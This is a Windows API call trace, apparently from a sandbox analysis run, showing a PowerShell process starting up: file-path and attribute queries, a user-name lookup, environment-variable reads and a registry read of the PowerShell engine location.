	[0228.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.850] SetErrorMode (uMode=0x1) returned 0x1
	[0228.850] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.850] SetErrorMode (uMode=0x1) returned 0x1
	[0228.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.850] SetErrorMode (uMode=0x1) returned 0x1
	[0228.850] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.850] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.850] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.850] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0228.851] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.851] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0228.851] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.851] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x27cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.851] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.851] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.851] SetErrorMode (uMode=0x1) returned 0x1
	[0228.851] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.852] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x27cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.852] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.852] SetErrorMode (uMode=0x1) returned 0x1
	[0228.852] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.853] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x27cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.862] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.862] SetErrorMode (uMode=0x1) returned 0x1
	[0228.862] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d330 | out: lpFileInformation=0x27d330*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.862] SetErrorMode (uMode=0x1) returned 0x1
	[0228.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.513] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0235.513] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d698 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d698) returned 0x1
	[0235.514] CoTaskMemFree (pv=0x56f200) 
	[0235.514] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0235.514] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d6d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d6d8) returned 1
	[0235.514] CoTaskMemFree (pv=0x4e89c0) 
	[0235.516] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f5d868*="Available", lpRawData=0x2f5d5f8) returned 1
	[0236.140] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0236.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.140] CoTaskMemFree (pv=0x506ba0) 
	[0236.141] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0236.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.142] CoTaskMemFree (pv=0x506ba0) 
	[0236.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.148] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0236.148] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0236.148] CoTaskMemFree (pv=0x506ba0) 
	[0236.148] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0236.148] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0236.148] CoTaskMemFree (pv=0x506ba0) 
	[0236.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.149] GetCurrentProcessId () returned 0x8b8
	[0236.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.175] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d6b8 | out: phkResult=0x27d6b8*=0x364) returned 0x0
	[0236.175] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d63c, lpData=0x0, lpcbData=0x27d638*=0x0 | out: lpType=0x27d63c*=0x1, lpData=0x0, lpcbData=0x27d638*=0x56) returned 0x0
	[0236.175] CoTaskMemAlloc (cb=0x5a) returned 0x1b793a10
	[0236.175] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d60c, lpData=0x1b793a10, lpcbData=0x27d608*=0x56 | out: lpType=0x27d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d608*=0x56) returned 0x0
	[0236.176] RegCloseKey (hKey=0x364) returned 0x0
	[0236.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
